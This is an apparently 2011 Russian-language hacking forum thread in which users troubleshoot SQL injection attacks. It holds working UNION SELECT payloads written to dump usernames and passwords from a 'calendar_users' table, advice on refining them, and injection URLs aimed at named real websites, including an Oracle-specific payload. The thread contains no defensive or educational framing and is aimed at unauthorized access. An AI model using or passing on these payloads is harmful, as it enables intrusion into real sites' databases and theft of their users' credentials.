27.08.2011, 16:23
|
|
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
С нами:
9116253
Репутация:
26
|
|
Данные не могу вывести, ХЗ в чём дело:
Код:
-1+UNION+SELECT+1,2,3,group_concat(username,0x3a,password),5,6,7,8+FROM+calendar_users+LIMIT+1,1+--
После этого проведения нет никаких ошибок, обычная страница с текстом.
Что ещё можно сделать?
ЗЫ:
Код:
-1 UNION SELECT 1,2,3, COLUMN_NAME,5,6,7,8 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0xblablabla LIMIT 0,100 --
|
|
|
27.08.2011, 16:26
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
С нами:
9761387
Репутация:
2
|
|
Сообщение от None
group_concat
и
Сообщение от None
LIMIT+1,1+--+
Жесть)
попробуй concat_ws(username,0x3a,password)
|
|
|
|
27.08.2011, 16:28
|
|
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
С нами:
9116253
Репутация:
26
|
|
Сообщение от None
попробуй concat_ws
Без изменений.
|
|
|
|
27.08.2011, 16:29
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
and 1=0 ...count(*)...concat... limit 0,1
|
|
|
|
27.08.2011, 16:34
|
|
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
С нами:
9116253
Репутация:
26
|
|
Код:
and 1=0 ... limit 0,1
Не меняется ничего и не выдаёт... |
|
|
|
27.08.2011, 16:46
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от Komyak
Код:
and 1=0 ... limit 0,1
Не меняется ничего и не выдаёт... Возможно вывод выпал в сорцы или в колонках пусто, либо данные начинаются не с первого поля. Попробуй ещё вывести без конкатенации.
|
|
|
|
27.08.2011, 16:52
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
На Limit не распространяется значение первого поля.
Komyak, в предыдущем сообщение я же вам написал показать count(*).
|
|
|
|
27.08.2011, 17:24
|
|
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
С нами:
9116253
Репутация:
26
|
|
Код:
+and+1=0+union+select+1,CONCAT(CONCAT(count(*),username,CONCAT(count(*),password))),3,4,5,6,7,8+from+calendar_users limit+0,1--
Вывод делает:
и все, больше ничего не получается извлечь. |
|
|
|
27.08.2011, 21:39
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 38
С нами:
8128406
Репутация:
0
|
|
Здравствуйте.
Подскажите как раскручивать такую SQL inj
http://www.vesti-moscow.ru/rnews.html?id=100114+order+by+13--
Но когда ввожу
http://www.vesti-moscow.ru/rnews.html?id=100114+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13--
Ошибка! 0_о
|
|
|
|
27.08.2011, 22:35
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от Samael91
Здравствуйте.
Подскажите как раскручивать такую SQL inj
http://www.vesti-moscow.ru/rnews.html?id=100114+order+by+13--
Но когда ввожу
http://www.vesti-moscow.ru/rnews.html?id=100114+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13--
Ошибка! 0_о
Там стоит Oracle
http://tvrus-sales.com/fullvideo.html?video_id=1705+union+select+null,nul l+from+sys.dual
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
